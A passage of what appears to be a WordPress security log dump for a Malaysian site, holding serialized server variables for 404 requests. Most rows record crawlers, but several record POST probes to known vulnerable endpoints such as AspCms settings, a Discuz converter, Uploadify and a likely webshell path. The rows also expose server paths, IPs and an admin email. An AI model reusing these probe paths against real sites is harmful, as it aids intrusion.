Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/author/admin/\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/author/admin/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XanEUPj6TRsrH6T-1xVNZQAAAIw\";s:12:\"REDIRECT_URL\";s:14:\"/author/admin/\";s:11:\"REMOTE_ADDR\";s:12:\"119.18.159.6\";s:11:\"REMOTE_PORT\";s:5:\"48274\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/author/admin/\";s:10:\"SCRIPT_URL\";s:14:\"/author/admin/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XanEUPj6TRsrH6T-1xVNZQAAAIw\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571406929.0442\";s:12:\"REQUEST_TIME\";s:10:\"1571406929\";}}','notice','2019-10-18 13:55:31','2019-10-18 13:55:29',35359152,37163968,'https://bintara.com.my/author/admin/',1,0,'119.18.159.6'),(28288,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/toughbook-l1/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/toughbook-l1/\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/toughbook-l1/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XanEuDCXUXY3N-POPdNP9QAAAMo\";s:12:\"REDIRECT_URL\";s:14:\"/toughbook-l1/\";s:11:\"REMOTE_ADDR\";s:12:\"207.46.13.73\";s:11:\"REMOTE_PORT\";s:5:\"10697\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/toughbook-l1/\";s:10:\"SCRIPT_URL\";s:14:\"/toughbook-l1/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XanEuDCXUXY3N-POPdNP9QAAAMo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571407032.6687\";s:12:\"REQUEST_TIME\";s:10:\"1571407032\";}}','notice','2019-10-18 13:57:14','2019-10-18 13:57:13',33815624,35619512,'https://bintara.com.my/toughbook-l1/',1,0,'207.46.13.73'),(28289,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:35:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:76:\"text/html, application/rss+xml, application/atom+xml, text/xml, text/rss+xml\";s:20:\"HTTP_ACCEPT_ENCODING\";s:12:\"gzip,deflate\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:75:\"Mozilla/5.0 (compatible; SemrushBot/6~bl; +http://www.semrush.com/bot.html)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"46.229.168.143\";s:11:\"REMOTE_PORT\";s:5:\"17010\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XanOfPj6TRsrH6T-1xVTLwAAAJE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571409533.0297\";s:12:\"REQUEST_TIME\";s:10:\"1571409533\";}}','notice','2019-10-18 14:38:54','2019-10-18 14:38:53',35407328,37210088,'https://bintara.com.my/?page_id=18',1,0,'46.229.168.143'),(28290,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:104:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.9) Gecko/20100101 Goanna/3.4 Firefox/52.9 PaleMoon/27.8.1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"91.243.223.170\";s:11:\"REMOTE_PORT\";s:5:\"56501\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xanrn-Ai1GJoeNqAc@u5LgAAABg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571416991.0734\";s:12:\"REQUEST_TIME\";s:10:\"1571416991\";}}','notice','2019-10-18 16:43:12','2019-10-18 16:43:11',34919288,36726408,'https://bintara.com.my/?page_id=18',1,0,'91.243.223.170'),(28291,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:14:\"CONTENT_LENGTH\";s:1:\"0\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:65:\"http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:15:\"HTTP_USER_AGENT\";s:51:\"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:65:\"http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XansJPj6TRsrH6T-1xVtCwAAAJE\";s:12:\"REDIRECT_URL\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:11:\"REMOTE_ADDR\";s:14:\"178.156.202.82\";s:11:\"REMOTE_PORT\";s:5:\"56749\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:65:\"http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:10:\"SCRIPT_URL\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XansJPj6TRsrH6T-1xVtCwAAAJE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571417124.5607\";s:12:\"REQUEST_TIME\";s:10:\"1571417124\";}}','notice','2019-10-18 16:45:26','2019-10-18 16:45:25',35262360,37071624,'http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp',1,0,'178.156.202.82'),(28292,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:52:\"/utility/convert/index.php?a=config&source=d7.2_x2.0\";s:14:\"CONTENT_LENGTH\";s:3:\"948\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:73:\"http://bintara.com.my/utility/convert/index.php?a=config&source=d7.2_x2.0\";s:15:\"HTTP_USER_AGENT\";s:51:\"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:25:\"a=config&source=d7.2_x2.0\";s:21:\"REDIRECT_QUERY_STRING\";s:25:\"a=config&source=d7.2_x2.0\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:47:\"http://bintara.com.my/utility/convert/index.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:26:\"/utility/convert/index.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XansK-Ai1GJoeNqAc@u5oAAAAAM\";s:19:\"REDIRECT_SCRIPT_URI\";s:47:\"http://bintara.com.my/utility/convert/index.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:26:\"/utility/convert/index.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XansK-Ai1GJoeNqAc@u5oAAAAAM\";s:12:\"REDIRECT_URL\";s:18:\"/convert/index.php\";s:11:\"REMOTE_ADDR\";s:14:\"178.156.202.82\";s:11:\"REMOTE_PORT\";s:5:\"59341\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:47:\"http://bintara.com.my/utility/convert/index.php\";s:10:\"SCRIPT_URL\";s:26:\"/utility/convert/index.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XansK-Ai1GJoeNqAc@u5oAAAAAM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571417131.1733\";s:12:\"REQUEST_TIME\";s:10:\"1571417131\";}}','notice','2019-10-18 16:45:33','2019-10-18 16:45:31',35279224,37082312,'http://bintara.com.my/utility/convert/index.php?a=config&source=d7.2_x2.0',1,0,'178.156.202.82'),(28293,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:32:\"/index.php/api/Uploadify/preview\";s:14:\"CONTENT_LENGTH\";s:2:\"66\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:53:\"http://bintara.com.my/index.php/api/Uploadify/preview\";s:15:\"HTTP_USER_AGENT\";s:51:\"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:9:\"PATH_INFO\";s:22:\"/api/Uploadify/preview\";s:15:\"PATH_TRANSLATED\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"178.156.202.82\";s:11:\"REMOTE_PORT\";s:5:\"62614\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:53:\"http://bintara.com.my/index.php/api/Uploadify/preview\";s:10:\"SCRIPT_URL\";s:32:\"/index.php/api/Uploadify/preview\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XansMvj6TRsrH6T-1xVtEAAAAI0\";s:8:\"PHP_SELF\";s:32:\"/index.php/api/Uploadify/preview\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571417138.8161\";s:12:\"REQUEST_TIME\";s:10:\"1571417138\";}}','notice','2019-10-18 16:45:40','2019-10-18 16:45:39',35261096,37076136,'http://bintara.com.my/index.php/api/Uploadify/preview',1,0,'178.156.202.82'),(28294,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:14:\"CONTENT_LENGTH\";s:1:\"0\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:65:\"http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:15:\"HTTP_USER_AGENT\";s:51:\"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:65:\"http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XansTvAi1GJoeNqAc@u5twAAABY\";s:12:\"REDIRECT_URL\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:11:\"REMOTE_ADDR\";s:14:\"178.156.202.82\";s:11:\"REMOTE_PORT\";s:5:\"58215\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:65:\"http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:10:\"SCRIPT_URL\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XansTvAi1GJoeNqAc@u5twAAABY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571417166.4475\";s:12:\"REQUEST_TIME\";s:10:\"1571417166\";}}','notice','2019-10-18 16:46:08','2019-10-18 16:46:06',35260856,37069680,'http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp',1,0,'178.156.202.82'),(28295,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"//asp/main.cer\";s:14:\"CONTENT_LENGTH\";s:3:\"683\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"220.205.78.224\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"220.205.78.224\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"http://bintara.com.my/asp/main.cer\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/asp/main.cer\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XanyUqKgLwuFCg2LGPQdRgAAAcI\";s:12:\"REDIRECT_URL\";s:13:\"/asp/main.cer\";s:11:\"REMOTE_ADDR\";s:15:\"183.167.168.137\";s:11:\"REMOTE_PORT\";s:5:\"16188\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"http://bintara.com.my/asp/main.cer\";s:10:\"SCRIPT_URL\";s:13:\"/asp/main.cer\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XanyUqKgLwuFCg2LGPQdRgAAAcI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571418707.7045\";s:12:\"REQUEST_TIME\";s:10:\"1571418707\";}}','notice','2019-10-18 17:11:54','2019-10-18 17:11:49',35777864,37579160,'http://bintara.com.my//asp/main.cer',1,0,'220.205.78.224'),(28296,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"//asp/main.cer\";s:14:\"CONTENT_LENGTH\";s:3:\"298\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"121.49.175.169\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"121.49.175.169\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"http://bintara.com.my/asp/main.cer\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/asp/main.cer\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XanyUQVftBBpAv@TWWu7VwAAAEI\";s:12:\"REDIRECT_URL\";s:13:\"/asp/main.cer\";s:11:\"REMOTE_ADDR\";s:15:\"183.167.168.137\";s:11:\"REMOTE_PORT\";s:5:\"13521\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"http://bintara.com.my/asp/main.cer\";s:10:\"SCRIPT_URL\";s:13:\"/asp/main.cer\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s